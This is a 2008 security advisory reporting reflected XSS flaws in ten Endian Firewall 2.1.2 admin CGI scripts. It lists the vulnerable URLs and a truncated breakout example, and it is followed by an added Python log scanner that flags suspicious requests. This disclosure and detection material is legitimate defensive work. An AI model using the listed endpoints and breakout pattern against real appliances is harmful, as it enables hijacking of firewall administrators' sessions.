#Security Advisory - Multiple Vulnerabilities in Endian Firewall#
Endian Firewall is a "turn-key" Linux security distribution that turns every system into a full-featured security appliance. It features stateful packet filtering, proxies, antivirus/antispam, content filtering and a VPN module.
Date : 02-12-2008
Product : Endian Firewall
Version : 2.1.2 - Prior versions may also be affected
Vendor : http://www.endian.com/en/
Author : syniack
Contact : syniack@gmail.com
S.Page : http://bsecure.net.pk
XSS Vulnerability: [TESTED]
Security issue in the following files:
https://example:10443/cgi-bin/logs_siproxy.cgi
https://example:10443/cgi-bin/logs_clamav.cgi
https://example:10443/cgi-bin/logs_smtp.cgi
https://example:10443/cgi-bin/logs_log.cgi
https://example:10443/cgi-bin/logs_proxy.cgi
https://example:10443/cgi-bin/logs_firewall.cgi
https://example:10443/cgi-bin/logs_ids.cgi
https://example:10443/cgi-bin/logs_dansguardian.cgi
https://example:10443/cgi-bin/backup.cgi
https://example:10443/cgi-bin/outgoingfw.cgi
Example:
">
">
Image Example Url:
http://img158.imageshack.us/my.php?image=endian02122008yu3.jpg
http://img150.imageshack.us/my.php?image=endian03122008openvpnxq5.jpg
http://img201.imageshack.us/my.php?image=endian05122008backupat3.jpg
http://img201.imageshack.us/my.php?image=endian06122008outgoingfla5.jpg
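For detection, the following added example (not part of the original advisory) scans web access-log lines for requests to the CGI scripts listed above whose query-string values carry attribute-breakout characters such as the `">` shown under "Example". The log format, parameter names and sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Affected scripts, copied from the advisory's list.
AFFECTED = {
    "logs_siproxy.cgi", "logs_clamav.cgi", "logs_smtp.cgi", "logs_log.cgi",
    "logs_proxy.cgi", "logs_firewall.cgi", "logs_ids.cgi",
    "logs_dansguardian.cgi", "backup.cgi", "outgoingfw.cgi",
}
# Assumption: the request is logged as "METHOD target HTTP/x.y" (combined log format).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Characters that let a reflected value close an HTML attribute or open a tag.
BREAKOUT_RE = re.compile(r'["\'<>]')

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding (e.g. %2522) a bounded number of times."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(line):
    """Return [(script, param, decoded_value)] for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    script = parts.path.rsplit("/", 1)[-1]
    if not parts.path.startswith("/cgi-bin/") or script not in AFFECTED:
        return []
    return [(script, name, fully_decode(value))
            for name, value in parse_qsl(parts.query, keep_blank_values=True)
            if BREAKOUT_RE.search(fully_decode(value))]

def scan(lines):
    return [hit for line in lines for hit in suspicious_params(line)]

# Constructed sample lines (not real logs); parameter names are hypothetical.
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Dec/2008:10:00:01 +0000] "GET /cgi-bin/logs_firewall.cgi?MONTH=11&DAY=2 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [02/Dec/2008:10:02:17 +0000] "GET /cgi-bin/logs_ids.cgi?MONTH=%22%3EMARKER HTTP/1.1" 200 5344',
    '192.0.2.44 - - [02/Dec/2008:10:02:30 +0000] "GET /cgi-bin/backup.cgi?ACTION=%2522%253EMARKER HTTP/1.1" 200 2210',
    '192.0.2.10 - - [02/Dec/2008:10:03:00 +0000] "GET /cgi-bin/status.cgi?x=%22%3E HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for script, param, value in scan(SAMPLE_LOG):
        print(f"{script}: {param!r} carries markup characters: {value!r}")
```

Access logs normally record only the request line, so this covers query-string parameters and not values sent in a POST body.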